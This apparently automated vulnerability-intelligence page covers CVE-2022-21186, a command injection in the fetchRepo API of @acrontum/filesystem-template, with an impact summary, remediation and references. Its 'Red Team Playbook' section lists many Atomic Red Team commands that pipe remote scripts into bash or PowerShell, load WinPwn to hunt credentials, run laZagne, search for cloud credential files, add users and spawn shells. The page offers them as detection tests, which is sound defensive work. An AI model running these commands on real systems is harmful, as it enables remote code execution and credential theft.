CVE-2022-21186
Overview
This vulnerability is an arbitrary command injection rooted in insufficient input sanitization within the fetchRepo API of the @acrontum/filesystem-template package. Specifically, the href parameter, which accepts external input, lacks proper validation or sanitization, allowing injection of malicious commands. The affected component is the fetchRepo function responsible for handling repository URLs in versions prior to 0.0.2.
Vulnerability Description
The package @acrontum/filesystem-template before 0.0.2 are vulnerable to Arbitrary Command Injection due to the fetchRepo API missing sanitization of the href field of external input.
Impact
An unauthenticated remote attacker can exploit this vulnerability by supplying a crafted href parameter to the fetchRepo API, resulting in arbitrary command execution on the host system. This can lead to full system compromise, data manipulation, or service disruption. The attack requires only network access with no user interaction or privileges, as indicated by the CVSS vector AV:N/AC:L/PR:N/UI:N. Such exploitation can facilitate lateral movement and persistent control over affected environments.
Solution
Users should upgrade @acrontum/filesystem-template to version 0.0.2 or later, where the fetchRepo API includes proper sanitization of the href parameter. Detailed remediation and patch information are available in the vendor’s GitHub repository pull request at https://github.com/acrontum/filesystem-template/pull/14/commits/baeb727b60991ad82d9e63ac660883793abc0acc and the advisory at https://security.snyk.io/vuln/SNYK-JS-ACRONTUMFILESYSTEMTEMPLATE-2419071. No alternative workarounds are documented.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the package @acrontum/filesystem-template stems from a critical flaw in the fetchRepo API, which fails to properly sanitize the href field of external input. This lack of input validation allows an attacker to inject arbitrary commands, potentially leading to severe consequences. By exploiting this weakness, an attacker can execute malicious commands on the server where the application is deployed, compromising the integrity and confidentiality of the system. The absence of adequate sanitization mechanisms means that any input passed through this API can be manipulated to execute unintended operations, making it a prime target for exploitation.
Attack vectors for this vulnerability are diverse and can be executed through various means. For instance, an attacker could craft a malicious request that includes a specially formatted href parameter, which, when processed by the fetchRepo API, triggers the execution of arbitrary commands. This could be done through web applications that utilize the affected package, where user input is directly fed into the API without proper validation. Additionally, attackers could leverage social engineering tactics to trick users into submitting malicious input, thereby facilitating the exploitation of this vulnerability. The potential for remote code execution makes this vulnerability particularly dangerous, as it can be exploited without physical access to the affected system.
The real-world impact of this vulnerability is significant, especially for organizations that rely on the affected package for their operations. The high CVSS score of 9.8 indicates a critical risk, suggesting that successful exploitation could lead to complete system compromise. Businesses may face severe repercussions, including data breaches, loss of sensitive information, and disruption of services. The financial implications can be substantial, encompassing costs associated with incident response, legal liabilities, and damage to reputation. Furthermore, the potential for attackers to deploy malware or ransomware through this vulnerability exacerbates the risk, as it could lead to prolonged downtime and recovery efforts.
To detect and mitigate the risks associated with this vulnerability, organizations should implement several strategies. First, regular security assessments and code reviews should be conducted to identify and remediate vulnerabilities in third-party packages. Automated tools can be employed to scan for known vulnerabilities and ensure that all dependencies are up to date. Additionally, input validation and sanitization should be enforced across all APIs, particularly those handling external input. Implementing a Web Application Firewall (WAF) can also help in filtering out malicious requests before they reach the application. Finally, organizations should establish an incident response plan to address potential exploitation swiftly, minimizing the impact on business operations.
In conclusion, the vulnerability present in the @acrontum/filesystem-template package poses a critical threat to organizations utilizing this software. The combination of arbitrary command injection and the potential for remote code execution creates a high-risk scenario that must be addressed proactively. By understanding the technical details, potential attack vectors, and real-world implications, organizations can better prepare themselves against exploitation. Implementing robust detection and mitigation strategies will be essential in safeguarding systems and maintaining operational integrity in the face of evolving cybersecurity threats.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Acrontum | Filesystem-Template | All |
cpe:2.3:a:acrontum:filesystem-template:*:*:*:*:*:node.js:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2022-21186 |
| security.snyk.io |
GitHub CVE
x_refsource_MISC
|
https://security.snyk.io/vuln/SNYK-JS-ACRONTUMFILESYSTEMTEMPLATE-2419071 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/acrontum/filesystem-template/pull/14/commits/baeb727b60991ad82d9e63ac660883793abc0acc |